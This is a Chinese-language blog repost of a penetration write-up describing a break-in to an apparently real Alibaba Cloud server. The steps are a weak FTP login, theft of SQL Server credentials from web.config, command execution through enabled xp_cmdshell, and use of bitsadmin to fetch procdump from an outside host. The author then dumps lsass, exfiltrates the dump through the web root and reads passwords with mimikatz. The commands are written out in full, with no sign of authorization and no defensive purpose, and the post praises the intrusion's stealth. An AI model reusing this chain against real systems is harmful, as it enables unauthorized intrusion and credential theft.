• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

ftp引发的一次渗透实战

脚本编程 SEO站长博客 4个月前 (08-13) 228次浏览 已收录 0个评论
无意中遇到ftp口令,以为没什么卵用。没想到一个小细节导致服务器直接搞定。

信息收集

IP 为阿里云 118.19.xx.xx、开放大量端口 21,22,80,81,1433,3389,8888 等等

ftp口令

指纹识别发现 81 端口为 serv-u 软件。一个弱口令ftp/ftp直接登录。原以为ftp用来传输文件作用不大,没想到无意中翻找到了 web.config 的敏感文件。

image.png

打开很明显看到 sql server 的配置信息。

image.png

mssql 命令执行

开启xp_cmdshell 组件

exec sp_configure ‘show advanced options’,1;reconfigure;

exec sp_configure ‘xp_cmdshell’,1;reconfigure;

直接执行系统命令

exec master.dbo.xp_cmdshell  ‘whoami’;

image.png

因为阿里云服务器的原因,想着直接激活 guest 用户,结果在添加到管理员组的时候并没有成功。查看进程,发现存在防护 aliyundun.exe

image.png

那采用 prodump 导出 lsass.dmp,然后从 web 下载到本地,再使用 mimikatz 读取密码。

此时有一个问题,web 的绝对路径还不知道。

web 路径查找

该 IP 的 8888 端口正常运行着 web 服务,为一 login.aspx 登录地址。

dir 搜索 logon.aspx

exec master.dbo.xp_cmdshell  ‘cd /d E: && dir /b /s Logon.aspx’

image.png

找到网站绝对路径,就简单啦~

dump  hash

从公网上下载 prodump.exe 下载到靶机上。

exec master.dbo.xp_cmdshell  ‘bitsadmin /transfer myDownLoadJob /download /priority normal “http://144.34.xxx.xxx/procdump64.exe” “C:\\Windows\\system32\\procdump.exe”‘

procdump.exe -accepteula -ma lsass.exe lsass.dmp

导出 lsass.dmp

image.png

再 copy lsass.dmp 到网站根目录下。需要重命名为 txt 后缀名。

exec master.dbo.xp_cmdshell  ‘copy lsass.dmp “E:\Program Files\DESS.Web\tmp.txt”‘

需要注意的是:

因为 windows 文件夹名称中间没有空格,如果文件夹名(或者目录名)中有空格,就必须加双引号了

访问 tmp.txt 下载。然后本地的 mimikatz 读取即可。

image.png

总结

不要放过任何一个细节。而且这次成功渗透,发现全程以静默化状态运行,没有挂马,没有恶意扫描。


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:ftp引发的一次渗透实战
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址